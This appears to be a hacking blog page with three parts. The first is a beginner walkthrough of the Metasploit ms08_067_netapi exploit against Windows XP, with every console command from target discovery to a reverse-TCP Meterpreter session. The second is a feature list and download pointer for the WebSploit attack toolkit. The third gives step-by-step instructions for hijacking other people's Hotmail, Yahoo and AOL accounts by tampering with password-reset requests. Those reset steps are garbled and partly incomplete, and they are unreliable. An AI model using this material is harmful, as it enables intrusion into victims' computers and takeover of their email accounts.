ms08_067_netapi Metasploit Attack

This tutorial I made for the new to Security & Backtrack users on the Top-Hat-Sec forums and My blog to get them familiar with the Metasploit console and maybe get them through penetrating their first system   This has to be run on an unpatched XP machine or VM with I believe only SP1 if I’m not mistaken.

First open netdiscover  to discover the attacking machine on your network. You can do this by just running that command alone into terminal or get more detailed and run it like this

netdiscover -i eth0 -r 192.168.0.1/24

with the output something like mine

Now open up a Metasploit console typing in terminal

msfconsole

Now we want to do a search for all exploits that have to do woth netapi so we run that serch with the command below

search netapi

You’ll want to run the exploit I highlited in this screenshot

exploit/windows/smb/ms08_067_netapi

Now type

show options to show all of the available options to set for this exploit

show options

Now lets set our Remote Host  “Machine we are attacking”  —->Victims PC

set RHOST 192.168.0.101

Now we want to set the payload for the exploit by typing in the command below

set PAYLOAD windows/meterpreter/reverse_tcp

Now we need to set the Local host which would be our machine —> “The Attackers Machine  “you”

set LHOST 192.168.0.100

Last but not least we will type in the command below to begin exploiting the system

exploit

If all works well you should see a “Meterpreter session 1 started  And a Meterpreter prompt below that. Thats it you are now inside the victims machine and can run and Meterpreter commands to continue exploiting the machine. Hopefully you guys find my tutorials usefull and I’ll make some more on SET and others in the near future. Thanks for checking it out.

WebSploit Toolkit 1.6

WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability

Description :
[+]Autopwn - Used From Metasploit For Scan and Exploit Target Service
[+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector - inject reverse & bind payload into file format
[+]phpmyadmin - Search Target phpmyadmin login page
[+]lfi - Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
[+]apache users - search server username directory (if use from apache webserver)
[+]Dir Bruter - brute target directory with wordlist
[+]admin finder - search admin & login page of target
[+]MLITM Attack - Man Left In The Middle, XSS Phishing Attacks
[+]MITM - Man In The Middle Attack
[+]Java Applet Attack - Java Signed Applet Attack
[+]MFOD Attack Vector - Middle Finger Of Doom Attack Vector
[+]USB Infection Attack - Create Executable Backdoor For Infect USB For Windows

Download Here : Websploit toolkit

Hotmail, AOL and Yahoo Password Reset

1.) Hotmail :

Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .
Step 2. Enter the Target Email and enter the 6 characters you see.
Step 3. Start Tamper Data
Step 4 . Delete Element "SendEmail_ContinueCmd"
Step 5. change Element "__V_previousForm" to "ResetOptionForm"
Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI"
Step 7. Click O.K and Type THe new Password
Step 8. sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time

                                             2.) Yahoo

Step 1. Go to this page https://edit.yahoo.com/forgot .
Step 2 . EnTer the Target Email . and Enter the 6 characters you see .
Step 3. Start Tamper Data Delete
Step 4. change Element "Stage" to "fe200"
Step 5. Click O.K and Type The new Password
Step 6.  Start Tamper Data All in Element Z

Step 7.done

3.) AOL:

Step 1. Go to Reset Page
Step 2. EnTer the Target Email . and Enter the characters you see .
Step 3. Start Tamper Data
Step 4. change Element "action" to "pwdReset"
Step 5. change Element "isSiteStateEncoded" to "false"
Step 6. Click O.K and Type THe new Password
Step 7. Start TamperDaTa All in Element rndNO
Step 8. done